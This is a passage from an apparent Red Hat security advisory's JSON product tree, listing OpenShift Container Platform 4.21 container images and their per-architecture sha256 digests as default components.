"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:962110a1c424f7893ae4cf2b7bc6a57a8c0070cbc699029fb0c7503217065dfb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:e6ea068305ca712061e83e4352b3fa9c2431dca533473928fa3c87ad1dc45a01_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x"
},
"product_reference": "registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f247b47505e0947c5a733c938a17a899af2faa5f3f0ae29b17ba0a0e30f99235_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:934795c45d33ed58aa148aca6a165a4f38ec9ce88413ed62404da19627e4c465_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:a1a7aff47d11acf486bb1e83bcb6aaffe8bc50dd4c655150708ede4cb9359c6d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:b45ff6b59330f93a7e91e911cb12a3676301613d69b500f139f0c414281bfa84_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x"
},
"product_reference": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e0b7b9cb40746ca2b38791ca125dae22dff7f6afadce2c31c7299c69dc316fac_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:002057809ba8771cebee023519dbfb91a5b4f5102a292695a7d6746e93faaeaf_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:146c6b876b93819d9f783515ad0214f1d0609905d5b0239c1d1c377a8a77f53f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:68fbb392a2e08a7c32f0bcfa78b1e4aacb67df3cae696160d7946013d97d54b7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x"
},
"product_reference": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:b576d483f631013f1beda76d250a739cf9680f8dcf53b4f0146e7998d6c9f0dd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:20544c6de0614e3e195c9f45aea764132229c619228fa4483f7e418297b96ff6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:7c4b7e341a617380ab6f0dd9a1012fdfe9908afd744a2c81cae644538f881602_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:f3eaf72bb86601787b4b2f26801528061ac5759c3ff7dc1caabb33a43ff556c5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:32532889f9a19086cc0567dd0375f43e303cb46cc646d8ff896d3599e7fa3cff_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:660e0c3c9ce138815279455fc77017a85398ee6130f0ed5d73c780ba454c6a90_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:7cd0406733f1313f3ec2011e8bce76ab83b044a75e5025fd8913796f03ad9356_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:8c41cf0e7e426f5092ac57f893c807b846a5737aa27882068ec6a982758aa8f1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:3f53284ee9720572b864ab12a87dfb98736e26dfd34e87f3967ec4800bc06b62_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45905152fdf546d05fe323898009781331f8665bb32fe7d91d2fad384ec8732e_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:45c1bb0d34fbf71bbd0caa65dc531e67575f34d7322e8d5313583aae4e0e2eab_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:f244e67bad477b8d5c57b74804a06fbd7d9403ae3d475ac2af71d927c6f888bd_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:0d786d1acd2b6102b55179f28ea29579c9f95593888305a12ff8574adec158d6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:6f0132e14e165e5d59ab20bb4e869d068aa8954e5aeae47c29cb84cc370b2b0a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:af02bf26ff1d9ffc8db66969f140e90d3318b894f63931b47818143ab1e99ff2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:fa8c6beaf4228a8f690b70daef15fdde242c3d196e783deaaf4d3769db488d74_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:22f01a38260fffda38bb27bd7b1d5d1af9018f7269fe989778a94046f0b58ade_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:480b04a55b7b86e80cc79c6695ab39b68a9714588eaa2d2c7264481541015651_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:c4d2014bca6fbda58a4797f0f2d5732efc3692a609899ba8ca063afd1103fd77_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:caf64d624cc8e698f0d6cbd583ea3d43b64e46da125b6608dfe4072915d68f43_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:229041be25597926b6cba147a685e9025f1fd38aaccd3ada69f6f08a36a1c3d5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:41cfbaf6fa7e1c4e9d9ab2bbfaed39024c445e6d9437745ee69ff6b9f1ea73b0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:73502251685a4ceb38593092b7b9678630d7266496bf860ec2abe6bb77afcea0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:fc6d0b64e7e5ccfdec2fa08bab5b2a0d598d2afe6272b593656d8b3c7d9aa725_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-agent-installer-ui-rhel9@sha256:9490248af37278e0b107eef719bea4e4b14e2840f42d5d31c0a546efb9a16ab8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:2e1a0d68274399049a694f58a73c92fcba077c59f50c20da896451b7724f1ebf_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:49dbeb17cd5787537cb5e30dd5d2c7adcf720346613c28004d292a5a554a4fa7_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:524c4410d51b126c6097fae3b2ad88ec67900e7b786a9131b7a8e96a194e4847_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:f5cdce5e8eee1b014ff8a0a12181a3d05d5dbb747e8e4114c18d7c891e97a477_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:7662f86e2f8f23582ae548c70dad5458e37256f9c4cdc401be880e319ef591c2_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
